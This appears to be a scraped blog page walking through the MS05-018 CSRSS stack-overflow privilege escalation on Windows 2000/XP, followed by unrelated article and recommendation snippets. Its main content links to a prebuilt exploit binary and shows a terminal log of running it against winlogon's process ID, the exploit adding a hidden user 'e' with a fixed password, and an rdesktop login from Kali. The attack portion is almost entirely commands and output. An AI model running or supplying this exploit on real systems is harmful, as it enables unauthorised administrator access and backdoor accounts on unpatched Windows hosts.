MS05-018

MS05-018

Works for Windows 2K SP3/4 | Windows XP SP1/2

Download ms05-018.exe:

https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/提权工具/windows提权工具/MS05018—CSRSS.EXE漏洞利用/MS05018—CSRSS.EXE漏洞利用/tool

  1. C:\WINDOWS\system32>systeminfo
  2. systeminfo
  4. Host Name:                 VULNBOX
  5. OS Name:                   Microsoft Windows XP Professional
  6. OS Version:                5.1.2600 Service Pack 1 Build 2600
  7. Processor(s):              1 Processor(s) Installed.
  8.                            [01]: x86 Family 6 Model 12 Stepping 2 GenuineIntel ~3457 Mhz
  9. BIOS Version:              INTEL  - 6040000
  10. Windows Directory:         C:\WINDOWS
  11. System Directory:          C:\WINDOWS\System32
  12. Boot Device:               \Device\HarddiskVolume1
  13. System Locale:             en-us;English (United States)
  14. Input Locale:              en-us;English (United States)
  15. Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
  16. Hotfix(s):                 3 Hotfix(s) Installed.
  17.                            [01]: File 1
  18.                            [02]: Q147222
  19.                            [03]: KB893803v2 - Update
  21. C:\Inetpub\wwwroot>MS05-018.exe
  22. ms5.exe
  23. MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
  24. Affect: Windows 2000 sp3/sp4 (all language)
  25. Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
  26. compile by Iceskysl [IST] --->www.iceskysl.net
  28. Usage: ms5.exe pid
  30. [+] PID=440 Process=winlogon.exe
  32. C:\Inetpub\wwwroot>MS05-018.exe 440
  33. ms5.exe 440
  34. MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
  35. Affect: Windows 2000 sp3/sp4 (all language)
  36. Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net
  37. compile by Iceskysl [IST] --->www.iceskysl.net
  39. [+] FreeConsole ok.
  40. [+] AllocConsole ok.
  41. [+] Get Console Title OK:"ms5.exe 440"
  42. [+] bingo! found hwnd=70038
  43. [+] start search "FF E4" in ntdll.dll
  44. [+] found "FF E4"(jmp esp) in 77FB59CC[ntdll.dll]
  45. [+] CreateFileMapping OK!
  46. [+] MapViewOfFile OK!
  47. [+] Send Exploit!
  48. [+] Done.
  50. It's will successful  add user :
  51. username=e
  52. password=asd#321
  54. root@kali:~# rdesktop -u e -p asd#321  x.x.x.x

Windows XP SP1 Privilege Escalation的更多相关文章

  1. OD: Heap in Windows 2K & XP SP1

    Windows 堆溢出 MS 没有完全公开 Windows 的堆管理细节,目前对 Windows 堆的了解主要基于技术狂热者.黑客.安全专家.逆向工程师等的个人研究成果. 目前 Windows NT4 ...

  2. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  3. Windows XP系列全下载(均为MSDN原版)

    正版windows xp sp3 下载大全(附:正版密钥) 微软MSDN Windows XP Professional下载 Windows XP Professional 简体中文 (最原始版本,无 ...

  4. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  5. 解决libcurl7.50.3在windows XP SP3 VC++ 6.0下编译报错 unresolved external symbol __imp__IdnToAscii@20 unresolved external symbol __imp__IdnToUnicode@20

    错误重现: --------------------Configuration: curl - Win32 LIB Debug DLL Windows SSPI DLL WinIDN--------- ...

  6. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  7. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  8. WinSetupFromUSB – Install Windows XP from USB Flash Drive

    http://myeeeguides.wordpress.com/2008/11/15/winsetupfromusb-install-windows-xp-from-usb-flash-drive/ ...

  9. 原版Windows XP Pro With SP3 VOL MSDN简体中文专业版

    2008年5月2日,微软推出Windows XP Pro With SP3 VOL MSDN x86 32位简体中文专业版,这是最经典也是我最喜爱的操作系统之一.在MSDN(微软开发者网络)的网站上查 ...

随机推荐

  1. 【IOI 2002/FJOI2019】任务安排(超级计算机)

    题目 \(N\) 个任务排成一个序列在一台机器上等待完成(顺序不得改变),这 \(N\) 个任务被分成若干批,每批包含相邻的若干任务.从时刻 \(0\) 开始,这些任务被分批加工,第 \(i\) 个任 ...

  2. 『AngularJS』创建 Service

    创建服务 Angular提供了几种有用的服务,对于所有的应用来说,你将会发现这些服务对于创建你自己的服务是有用处的.为了创建自己的服务,你应该从通过一个模块(module)注册一个服务工厂方法开始(可 ...

  3. 梳理 Opengl ES 3.0 (五)shader运行原理

    先来看看一张图 shader都是在运行时编译和执行的,每个shader都有一个main函数作为它的入口. vertex shader的功能有两个:一个是计算顶点坐标变换,另一个就是为片元shader计 ...

  4. CVPR2018: Generative Image Inpainting with Contextual Attention 论文翻译、解读

    注:博主是大四学生,翻译水平可能比不上研究人员的水平,博主会尽自己的力量为大家翻译这篇论文.翻译结果仅供参考,提供思路,翻译不足的地方博主会标注出来,请大家参照原文,请大家多多关照. 转载请务必注明出 ...

  5. xshell连接不到虚拟机,安装ssh服务

    刚安装的虚拟机镜像是Ubuntu 16.04版本,防火墙已经关闭. 测试: 检查虚拟机分配的ip地址. 1.虚拟机ping宿主机:可以ping通 2.宿主机ping虚拟机:可以ping通 3.检查网络 ...

  6. Spring 学习笔记(八)—— 注解使用整合

    @Autowired  —— 自动装配 需先在配置文件中,配置一个org.springframework.beans.factory.annotation. AutowiredAnnotationBe ...

  7. Alpha冲刺(7/10

    团队信息 队名:爸爸饿了 组长博客:here 作业博客:here 组员情况 组员1(组长):王彬 过去两天完成了哪些任务 学会了POSTMAN的使用,对后端已经完成的接口进行了收发消息正确性的验证 推 ...

  8. Java中的输入输出流

    FileInputStream和FileOutputStream 创建含磁盘文件的输入 输出流对象. FileInputStream继承自InputStream,用于读取本地文件中的字节数据,由于所有 ...

  9. kafka卡顿

    一次kafka卡顿事故排查过程 https://www.cnblogs.com/yougewe/p/8975550.html 由于一次功能上线后,导致某数据量急剧下滑,给我们紧张的呢!排查过程也是个学 ...

  10. SMT(SF)

    示例一: uint iPwmDuty; double temp; temp = (double)AdConvert(AN_TEMPERATURE); temp = temp/; iPwmDuty = ...